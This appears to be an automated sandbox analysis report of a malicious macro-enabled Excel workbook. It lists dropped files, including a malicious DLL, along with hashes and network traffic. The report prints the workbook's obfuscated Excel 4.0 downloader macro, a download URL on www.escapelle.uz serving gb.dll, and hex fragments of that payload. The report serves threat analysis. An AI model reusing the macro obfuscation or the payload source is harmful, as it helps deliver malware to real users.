                                                                                                                      Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\~DF331C8CD839ED59BF.TMP
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):512
                                                                                                                      Entropy (8bit):0.0
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3::
                                                                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                      Malicious:false
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\Desktop\~$FILE_915494026923219.xlsm
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):165
                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                      Malicious:true
                                                                                                                      Reputation:high, very likely benign file
                                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                      C:\Users\user\besta.ocx
                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):473600
                                                                                                                      Entropy (8bit):7.196223462459893
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:mFyGBDytNZAR5Myju+qQuj/J+7L6Dg8stHb1h:mF92e/jEk7mDg8stJh
                                                                                                                      MD5:1F50BEBB323B3AE8E1EEC983C08BE7CC
                                                                                                                      SHA1:E64D4FE4128CA770514E9BC499B4473A41D9AC21
                                                                                                                      SHA-256:4DD6170895A3BFDF5568AAB65EDFDE43051BF245F059C669E902621F25EAB94C
                                                                                                                      SHA-512:687F7C268CB90EFE34429D1DFC83C7AB5EDDCE4EE14BE1E59ED02CFED8AA782346CA61EC4F93B6FE619A440E76C246E7E2C9B6C3992464A7EB83B58503319447
                                                                                                                      Malicious:true
                                                                                                                      Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........A~.. ... ... ...F... ...F..D ...U... ...U... ...U... ...F... ...F... ...F... ... ..< ..TU... ..TU... ..TU.. ... ... ..TU... ..Rich. ..........................PE..L....a...........!.................L...............................................Y....@.............................D..............HD...................P..x-..................................8h..@...............(............................text.............................. ..`.rdata.. %.......&..................@..@.data....#..........................@....rsrc...HD.......F..................@..@.reloc..x-...P......................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:Microsoft Excel 2007+
                                                                                                                      Entropy (8bit):7.626599754248216
                                                                                                                      TrID:
                                                                                                                      • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                      • ZIP compressed archive (8000/1) 8.08%
                                                                                                                      File name:FILE_915494026923219.xlsm
                                                                                                                      File size:38112
                                                                                                                      MD5:9eb8e0e5691ff59e86077c878feabc88
                                                                                                                      SHA1:5c1c11b3c2abbf960616710cb780ca3489d64809
                                                                                                                      SHA256:91c6ece37265eecefed9274abfacb57b4146166628f04f0674d3f14fc6bb4b09
                                                                                                                      SHA512:3f724118511820f8a29ee9c71f6cf7a78a8cf8f388e987053c276a8a9a55b8518462b1f2fd5022c644e7e795ef84ae387acb6da83d610483acb8067700765eec
                                                                                                                      SSDEEP:768:tg4/I83CrjevZCwVIUQ0vxmUxjfC30+kS4QyoO0VI0dRn0:tfnCIIUPvxXYk4pTVI82
                                                                                                                      File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                      Static OLE Info

                                                                                                                      General

                                                                                                                      Document Type:OpenXML
                                                                                                                      Number of OLE Files:1

                                                                                                                      OLE File "FILE_915494026923219.xlsm"

                                                                                                                      Indicators

                                                                                                                      Has Summary Info:
                                                                                                                      Application Name:
                                                                                                                      Encrypted Document:
                                                                                                                      Contains Word Document Stream:
                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                      Contains Visio Document Stream:
                                                                                                                      Contains ObjectPool Stream:
                                                                                                                      Flash Objects Count:
                                                                                                                      Contains VBA Macros:

                                                                                                                      Macro 4.0 Code

                                                                                                                      4,7,=CHAR('Ss1'!E45)
                                                                                                                      11,1,o
                                                                                                                      
                                                                                                                      1,5,L
                                                                                                                      11,1,=CHAR('Ss1'!N43)
                                                                                                                      
                                                                                                                      2,0,r
                                                                                                                      10,4,=CHAR('Ss1'!D39)
                                                                                                                      
                                                                                                                      1,8,C
                                                                                                                      12,3,=CHAR('Ss1'!S46)
                                                                                                                      
                                                                                                                      1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)
                                                                                                                      
                                                                                                                      2,7,=
                                                                                                                      8,2,=CHAR('Ss1'!G40)
                                                                                                                      
                                                                                                                      1,2,A
                                                                                                                      7,8,=CHAR('Ss1'!J39)
                                                                                                                      
                                                                                                                      2,6,=CHAR('Ss1'!R41)
                                                                                                                      9,1,e
                                                                                                                      

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 2, 2021 09:40:05.145123959 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.145195007 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.145273924 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.165178061 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.165213108 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.414729118 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.414824009 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.424057961 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.424086094 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.424416065 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.424482107 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.666003942 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.712871075 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.914577007 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.914707899 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.914738894 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.914761066 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.914819956 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.914843082 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.914849997 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.914868116 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.914931059 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.915524960 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.915638924 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.915652037 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.915673971 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:05.915736914 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:05.925331116 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.033220053 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.033283949 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.033466101 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.033485889 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.033565998 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.033746004 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.034468889 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.034522057 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.034588099 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.034616947 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.034627914 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.034771919 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.035160065 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.035974979 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.036029100 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.036093950 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.036106110 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.036114931 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.036169052 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.037739992 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.037792921 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.037887096 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.037914991 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.037925959 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.037980080 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.038276911 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.152192116 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.152276039 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.152446032 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.152466059 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.152527094 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.152791977 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.154310942 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.154390097 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.154443026 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.154459953 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.154473066 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.154516935 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.156196117 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.156279087 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.156310081 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.156327963 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.156342030 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.156379938 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.157706022 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.159540892 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.159615993 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.159660101 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.159673929 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.159691095 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.159727097 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.161756039 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.161874056 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.161874056 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.161886930 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.161943913 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.163872004 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.163947105 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.163974047 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.163988113 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.164002895 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.164056063 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.165239096 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.165313005 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.165326118 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.165338993 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.165357113 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.165397882 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.195642948 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.195760012 CET4434916762.209.128.105192.168.2.22
                                                                                                                      Dec 2, 2021 09:40:06.195835114 CET49167443192.168.2.2262.209.128.105
                                                                                                                      Dec 2, 2021 09:40:06.195853949 CET4434916762.209.128.105192.168.2.22

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 2, 2021 09:40:05.112469912 CET5216753192.168.2.228.8.8.8
                                                                                                                      Dec 2, 2021 09:40:05.132570982 CET53521678.8.8.8192.168.2.22

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                      Dec 2, 2021 09:40:05.112469912 CET192.168.2.228.8.8.80xcbfStandard query (0)www.escapelle.uzA (IP address)IN (0x0001)

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                      Dec 2, 2021 09:40:05.132570982 CET8.8.8.8192.168.2.220xcbfNo error (0)www.escapelle.uzescapelle.uzCNAME (Canonical name)IN (0x0001)
                                                                                                                      Dec 2, 2021 09:40:05.132570982 CET8.8.8.8192.168.2.220xcbfNo error (0)escapelle.uz62.209.128.105A (IP address)IN (0x0001)

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • www.escapelle.uz

                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      0192.168.2.224916762.209.128.105443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      2021-12-02 08:40:05 UTC0OUTGET /wp-includes/n1vS/ HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      UA-CPU: AMD64
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                      Host: www.escapelle.uz
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2021-12-02 08:40:05 UTC0INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 02 Dec 2021 08:40:05 GMT
                                                                                                                      Content-Type: application/x-msdownload
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Thu, 02 Dec 2021 08:40:05 GMT
                                                                                                                      Content-Disposition: attachment; filename="gb.dll"
                                                                                                                      Content-Transfer-Encoding: binary
                                                                                                                      Set-Cookie: 61a88665c5d7b=1638434405; expires=Thu, 02-Dec-2021 08:41:05 GMT; Max-Age=60; path=/
                                                                                                                      Last-Modified: Thu, 02 Dec 2021 08:40:05 GMT
                                                                                                                      X-Powered-By: PleskLin
                                                                                                                      2021-12-02 08:40:05 UTC0INData Raw: 66 65 31 39 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 41 7e d3 e1 20 10 80 e1 20 10 80 e1 20 10 80 84 46 13 81 ec 20 10 80 84 46 15 81 44 20 10 80 b3 55 15 81 b2 20 10 80 b3 55 14 81 f1 20 10 80 b3 55 13 81 f7 20 10 80 84 46 14 81 f9 20 10 80 84 46 16 81 e0 20 10 80 84 46 11 81 f0 20 10 80 e1 20 11 80 3c 20 10 80 54 55 19 81 ee 20 10 80 54 55 10 81 e0 20 10 80 54 55 ef 80 e0 20 10 80 e1 20 87 80 e0 20 10 80 54
                                                                                                                      Data Ascii: fe19MZ@ !L!This program cannot be run in DOS mode.$A~ F FD U U U F F F < TU TU TU T
                                                                                                                      2021-12-02 08:40:05 UTC16INData Raw: 50 83 ec 24 53 56 57 a1 08 d0 04 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b c2 89 45 d4 8b d9 8b c8 89 5d dc c7 45 d0 00 00 00 00 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8b 13 89 4d e0 8b 42 04 8b 7c 18 24 8b 74 18 20 85 ff 7c 17 7f 0e 85 f6 74 11 85 ff 7c 0d 7f 04 3b f1 76 07 2b f1 83 df 00 eb 0e 0f 57 c0 66 0f 13 45 e4 8b 7d e8 8b 75 e4 8b 44 03 38 8b ca 89 5d e4 85 c0 74 10 8b 4a 04 8b 00 8b 4c 0b 38 ff 50 04 8b 13 8b ca c7 45 fc 00 00 00 00 8b 42 04 03 c3 83 78 0c 00 74 04 32 c0 eb 25 8b 40 3c 85 c0 74 1c 3b c3 74 18 8b c8 e8 48 fa ff ff 8b 13 8b ca 8b 42 04 83 7c 18 0c 00 0f 94 c0 eb 02 b0 01 88 45 e8 c7 45 fc 01 00 00 00 84 c0 75 0a be 04 00 00 00 e9 3e 01 00 00 c6 45 fc 02 8b 42 04 8b 44 18 14 25 c0 01 00 00 83 f8 40 74 65 85 ff 7c 5f 7f 04 85
                                                                                                                      Data Ascii: P$SVW3PEdeE]EQAu+MB|$t |t|;v+WfE}uD8]tJL8PEBxt2%@<t;tHB|EEu>EBD%@te|_
                                                                                                                      2021-12-02 08:40:06 UTC32INData Raw: 85 c0 0f 88 4d 04 00 00 8b 45 dc 85 c0 0f 84 86 04 00 00 8b 08 8d 55 d8 52 50 ff 51 2c 85 c0 0f 88 30 04 00 00 33 c0 89 45 e0 33 db c6 45 fc 04 8b 3d f4 a1 03 10 89 5d a8 39 5d d8 0f 8e 7e 02 00 00 8b 75 dc 85 f6 0f 84 4c 04 00 00 8b 0e 8b 79 28 c6 45 fc 05 85 c0 74 06 8b 08 50 ff 51 08 8d 45 e0 c6 45 fc 04 50 53 56 c7 45 e0 00 00 00 00 ff d7 85 c0 0f 88 3e 02 00 00 c7 45 ec 00 00 00 00 c6 45 fc 08 8b 45 e0 85 c0 0f 84 08 04 00 00 8b 08 8d 55 ec 52 50 ff 51 1c 85 c0 0f 88 0d 02 00 00 8b 45 e0 85 c0 0f 84 eb 03 00 00 8b 08 8d 55 b0 52 50 ff 51 20 85 c0 0f 88 f0 01 00 00 8b 7d ec 6a 0c e8 f5 b6 00 00 8b f0 83 c4 04 89 75 98 c6 45 fc 0d 85 f6 74 33 0f 57 c0 66 0f d6 06 c7 46 08 00 00 00 00 57 c7 46 04 00 00 00 00 c7 46 08 01 00 00 00 ff 15 f8 a1 03 10 89 06
                                                                                                                      Data Ascii: MEURPQ,03E3E=]9]~uLy(EtPQEEPSVE>EEEURPQEURPQ }juEt3WfFWFF
                                                                                                                      2021-12-02 08:40:06 UTC48INData Raw: 89 7d e8 89 5d ec 89 45 f0 83 f8 08 72 05 8b 03 89 45 ec 8d 04 3f bb c5 9d 1c 81 33 ff 89 45 f4 85 c0 74 23 8b 75 ec 8b d0 0f 1f 80 00 00 00 00 0f b6 04 37 47 33 c3 69 d8 93 01 00 01 3b fa 72 ef 8b 55 fc 8b 75 f8 8b 45 e4 8b 78 18 8b 40 0c 23 fb 8d 04 f8 89 45 ec 39 30 75 0a 89 08 89 48 04 e9 4c 01 00 00 8b 40 04 83 78 1c 08 8d 78 08 8b 5f 10 89 5d f4 72 02 8b 3f 83 7d f0 08 8d 59 08 89 5d fc 72 06 8b 59 08 89 5d fc 8b 75 e8 3b 75 f4 8b 75 f8 75 5a 8b 5d e8 85 db 89 5d f4 8b 5d fc 0f 84 1d 01 00 00 0f b7 37 0f b7 1b 66 3b de 8b 75 f8 72 3b 29 7d fc 0f 1f 80 00 00 00 00 0f b7 37 66 3b de 8b 75 f8 77 26 8b 5d f4 83 fb 01 0f 84 ee 00 00 00 0f b7 77 02 4b 89 5d f4 83 c7 02 8b 5d fc 0f b7 1c 1f 66 3b de 8b 75 f8 73 cf 8b 7d ec 39 07 0f 84 93 00 00 00 0f 1f 40
                                                                                                                      Data Ascii: }]ErE?3Et#u7G3i;rUuEx@#E90uHL@xx_]r?}Y]rY]u;uuuZ]]]7f;ur;)}7f;uw&]wK]]f;us}9@
                                                                                                                      2021-12-02 08:40:06 UTC64INData Raw: 15 a0 a2 03 10 33 c0 5e 5d c2 08 00 cc cc cc cc b8 01 40 00 80 c2 10 00 cc cc cc cc cc cc cc cc 55 8b ec 8b 45 0c c7 00 01 00 00 00 33 c0 5d c2 08 00 cc cc cc cc cc cc cc 0d 0a 36 33 62 65 37 0d 0a cc cc cc cc cc cc cc 55 8b ec 8b 4d 08 8b 45 0c 89 81 84 00 00 00 33 c0 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 8b 88 84 00 00 00 8b 45 0c 89 08 33 c0 5d c2 08 00 cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 d0 8f 03 10 64 a1 00 00 00 00 50 53 83 ec 30 a1 08 d0 04 10 33 c5 89 45 ec 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 7b 0c 33 c9 8b 43 08 0f 57 c0 89 45 cc be 05 40 00 80 89 7d c8 89 4d e8 89 4d d4 0f 11 45 d8 85 ff 0f 84 e1 00 00 00 89 4d fc 8d 4d e8 8b 07 51 68 0c 63 04 10 57 ff
                                                                                                                      Data Ascii: 3^]@UE3]63be7UME3]UEE3]SUkl$jhdPS03EVWPEd{3CWE@}MMEMMQhcW
